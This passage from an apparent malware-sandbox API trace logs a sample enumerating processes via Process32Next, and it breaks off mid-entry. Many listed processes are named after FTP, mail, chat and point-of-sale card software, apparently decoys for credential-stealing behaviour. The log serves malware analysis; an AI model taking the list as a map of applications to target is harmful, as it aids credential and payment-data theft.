lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.888] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.889] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.891] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.892] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.894] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.895] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0290.897] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0290.898] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.900] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.904] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0290.906] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0290.907] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0290.909] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0290.910] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.912] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0290.914] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.916] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.923] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.925] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0290.927] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0290.928] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0290.930] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0290.989] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0290.995] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0290.997] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0290.999] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0291.001] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0291.002] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0291.004] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0291.006] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0291.008] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0291.010] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0291.015] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0291.017] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0291.019] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0291.021] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0291.023] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0291.024] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0291.031] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0291.033] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0291.034] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0291.036] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0291.038] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0291.040] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0291.096] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0291.097] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0291.099] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0291.101] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0291.102] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0291.107] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0291.109] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0291.111] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0291.113] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0291.116] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0291.118] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0291.123] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0291.125] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0291.127] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0291.129] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0291.130] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0291.132] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0291.134] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0291.190] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0291.191] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0291.193] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0291.195] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0291.197] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0291.198] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0291.202] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0291.204] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0291.205] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0291.207] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0291.209] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0291.210] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0291.212] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0291.213] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0291.219] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0291.222] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0291.225] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0291.228] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0291.392] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0291.394] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0291.395] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal 